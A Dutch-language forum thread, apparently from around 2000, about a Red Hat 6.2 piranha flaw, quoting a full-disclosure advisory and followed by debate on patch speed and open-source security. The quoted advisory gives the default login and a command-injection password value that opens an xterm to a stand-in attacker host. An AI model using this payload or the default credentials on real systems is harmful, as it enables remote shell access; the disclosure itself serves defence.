Bug in Red Hat Linux zet server open voor hackers

dvis2:

ik weet niet waar jij die data vandaan haalt, maar dit probleem speelde al een aantal dagen voor de patch. In ieder geval ging via de mailinglist van securityfocus.com al 3 dagen geleden de volgende mail rond:

Hi,

In the interest of full disclosure (I used an alias the last few times,
let's see how this goes as me) here are the details of the piranha
vulnerability. RE: ISS Security Advisory iss.00-04-23.Piranha

To summarize, piranha is a GUI tool for monitoring, configuring, and
administering an LVS cluster. The Redhat 6.2 package piranha-0.4.12
supports web-based php3 interface which is protected by basic
authentication. A default account is provided, that if known, would allow
remote users to change the piranha password as well as run arbitrary
commands on the web server by exploiting a hole in the passwd.php3 script.

First the IDS Signature to detect the attack: http://whitehats.com/IDS/272

(See http://whitehats.com/ids for basic information about using signatures to detect attacks on your network.)

Now the exploit: There are basically two problems with the piranha-0.4.12 package, that when combined yield shell access for an attacker. The reason earlier
versions are not vulnerable is because of the shift away from the gui, towards a web-based php3 interface.

The first problem is the default account and password that protect the web directory containing the administrative php3 scripts. This is what ISS called a "backdoor" - which is actually a default password. (If ISS found something other than what I found, please email me...)

The default username/password is: piranha/q

Now the ironic part is, the second part of the vulnability lies within the program that is used to change the password! By default this is installed into /home/httpd/html/piranha/secure as passwd.php3, or:

http://victim.example.com/piranha/secure/passwd.php3
victim.example.com/piranha/secure/passwd.php3
victim.example.com/piranha/secure/passwd.php3

Once you authenticate (see first vulnerability), a form will come up asking for the new password. To avoid typo-regret, you must enter the password twice. It will then proceed to change the piranha password to
whatever you provided as the new password. It does this by passing your input to a shell command without filtering for metacharacters...

passwd.php3:
echo "The passwords you supplied match";
$temp = `/usr/bin/htpasswd -b passwords piranha $try1`;

As one can see, this allows for more creative "new passwords", such as this one:

g23 ;/usr/X11R6/bin/xterm -display attacker.example.com:0 -ut;

Example exploit URL (requires authentication):

--
Max Vision Network Security <vision@whitehats.com>
Network Security Assessment
100% Success Rate : Penetration Testing & Risk Mitigation
Free Visibility Analysis and Price Quote for Your Network

(overigens is die patch er alsnog sneller dan het gemiddelde servicepack van windows
/me Paz

Nou het is weer leuk te zien dat de meeste Linux freaks gewoon domme napraters zijn ...
Ik kan jullie garanderen dat M$ ook supersnel is met patches ... schrijf je eens in op de mailling lists van zowel NTbugtraq + M$ Security bulletin ... dan zie je bugs gereport worden op bugtraq en ff later meteen een patch available van Billy boy .... meestal een paar uur, soms een dag later ...
Of je nou windohoos, linux, freebsd of OS/2 draait, je moet gewoon altijd een zooi patches installeren voordat je alle 'bekende' gaten dicht hebt...

dit is de goede link:
www.webwereld.nl/nav/n?4268

Dat de patch nu beschikbaar is, is gewoon perfect. Zo hoort het

Fouten zijn pas erg op het moment dat er ook daadwerkelijk misbruik van wordt gemaakt. En dat kan nu mooi niet, mits de systeembeheerder een beetje vlot is.

Detect-Fix tijd zou eigenlijk Publicly Reported-Fix tijd moeten zijn.....
Wie zegt dat een hacker die fout niet eerder heeft gevonden?

Tja, storm in een glas water dit gezever. Zoals iemand op /. terecht opmerkte: als iemand zonder de default passwords te wijzigen een server online zet, dan moet die server helemaal niet online zijn. De 2e bug van de commando's achter de wachtwoord string is een typische unix flaw die 10 jaar geleden al in sendmail zat. Dat is wel een beetje raar dat mensen nu nog steeds dezelfde fouten maken bij het programmeren. .

Het gedrein over wie sneller is met security fixes is niet aan de orde: MS heeft een QA layer die eerst alles moet testen alvorens een fix de deur uit gaat. Er werken namelijk nogal wat meer mensen met windows dan met redhat. Dat kost maximaal een dag extra. Het was schrikbarend erg een aantal jaren terug maar tegenwoordig zit er nauwelijks een dag tussen de bug ontdekking EN report naar MS en een fix. Indien een fix niet 1 2 3 mogelijk is (niet dom kijken, dat is zeker wel mogelijk) dan kost het langer. Ook bij RH en andere os-en. Sun leverde laatst een fix af voor een security lek wat al 1.5 jaar open stond.

Schrikbarender vind ik zelf het feit dat de OSS movement altijd claimt dat Open Source VEILIGER is omdat er zoveel mensen naar de source kijken. Nou.... naar deze source hebben echt 0.0 mensen gekeken alvorens hij in de distro werd toegevoegd. Deze bug is namelijk ontdekt door naar de source te kijken. Kan gebeuren, maar ik denk dat RHat (die al veel doet om QA in te voeren) en andere distro's er goed aan doen MEER of iig IETS aan QA te gaan doen alvorens distributies de wereld in te sturen. De piranha software was versie 0.4 dacht ik, dus echt geen final, maar er zijn zat mensen die het willen draaien en dat ook gewoon doen in productie omgevingen.

Last but nog least: de wat is een os discussie: die heeft hier geen ruk mee te maken. Als Wordpad een bug bevat om macro's te executeren (zit er nog steeds in) dan moet dat gepatcht worden. Als een Unix wordt gedistribueerd met een 'handige servershare tool' en die bevat leaks dan moet die tool gepatcht worden. Of dat nu tot het OS behoord of niet, dat boeit niet. Beide keren kan er schade berokkend worden of kunnen mensen wellicht de security omzeilen. HOE dat gebeurt is niet relevant, dat het NIET moet / mag gebeuren staat buiten kijf.

Zo, dat was toch wel een pro-linux posting, nooit gedacht dat ik dat in me had

Ik draai Slackware op m'n server dus ik heb geen last van de bug. Ik vind het sowieso niet verstandig om oa RedHat, SuSE, Mandrake en nog een aantal andere te gebruiken als server, daarvoor kun je denk ik het best Debian nemen. Mede omdat de laatste stabiele versie verouderd is heb ik voor Slack gekozen op m'n server omdat ik dan niet zoveel hoef te patchen (samba oa). Maar voor een echte mission critical server is het zeker niet verstandig om zo'n "desktop" geoptimaliseerde Linux te gebruiken die zeer snel met opvolgers komt (suse?).

Otis,
</div><div class=b4>Schrikbarender vind ik zelf het feit dat de OSS movement altijd claimt dat Open Source VEILIGER is omdat er zoveel mensen naar de source kijken. Nou.... naar deze source hebben echt 0.0 mensen gekeken alvorens hij in de distro werd toegevoegd. Deze bug is namelijk ontdekt door naar de source te kijken.</div><div class=b1>
/me FlipZ
Maar dan is hij dus wel gevonden doordat het open source is !

</div><div class=b4>De piranha software was versie 0.4 dacht ik, dus echt geen final, maar er zijn zat mensen die het willen draaien en dat ook gewoon doen in productie omgevingen. </div><div class=b1>

IHMO moet je gewoon nooit het nieuwste van het nieuwste willen, vooral niet als het internet gerelateerde software is. "Better save than sorry". Met open source software in het bijzonder vanwege de manier van ontwikkeling.

Flipz:
</div><div class=b4>
FlipZ denkt
Maar dan is hij dus wel gevonden doordat het open source is !
</div><div class=b1>

Maar bij CLOSED source was de hele backdoor nooit ontdekt. Nu jij weer.

(* EfBe Otis

Otis,

Bij Closed source software was de bug minder snel ontdekt, maar degene die 'm ontdekt zou hebben zou er sneller kwaad mee doen. De attitude van de Windows hackers is nou eenmaal wat anders dan die van Linux-kernel-source-doorspitters. Hoewel dat ook verandert als Linux populairder wordt.

En ZO snel zijn ze bij M$ nou ook weer niet met bugfixes. Er zitten nog een paar memory overflow exploit bugs in IIS. (tenminste, een half jaar geleden nog wel. Hacken is niet m'n hobby, dus ik heb het niet recent meer geprobeerd) En Visual Studio (met SP3) blijft ook maar over internal compiler errors klagen, maarja, dat soort bugs is nou eenmaaal niet interessant voor de media.

20 jaar open source, en nog bugs in Sendmail. Tsja. De Berkeley TCP/IP stack is ook nog niet helemaal bomvrij, maar toch aardig stabiel. (schijnt de meest stabiele ter wereld te zijn, maar dat heb ik ook maar van een *BSD freak) En daar worden ook nog zo af en toe bugs in gevonden.

Nouja, open source, closed source, het zal me een zorg zijn. Als het maar werkt.

P.S. Otis, stuur me ff een mailtje. 'k ben je e-mail adres kwijt.

Otis,</div><div class=b4>Maar bij CLOSED source was de hele backdoor nooit ontdekt.</div><div class=b1>

Je redeneert dat als de bug tot in alle eeuwigheid nooit ontdekt wordt het ook goed is, dat klopt, maar IMHO is het het beste als de werking van een beveiligingssysteem volledig bekend is bij iedereen, maar dat het gewoon waterdicht is.

maar bij closed source was de hele backdoor nooit ontdekt Doet mij denken aan een gevangenis waarvan één van de deuren niet op slot zit. Het argument van jou (de bewaker) is: "Ja, maar de gevangenen weten niet dat hij niet op slot zit"

Het is toch gewoon het beste om het ding op slot te doen

OpenBSD is open source, maar wel het veiligste systeem ter wereld. Een B1 certificaat of zoiets heeft het toch?? En NT heeft een C???
/me FlipZ
Open source is wel degelijk veiliger, deze bug illustreerd dat, want de fix is er al voordat de final uit is.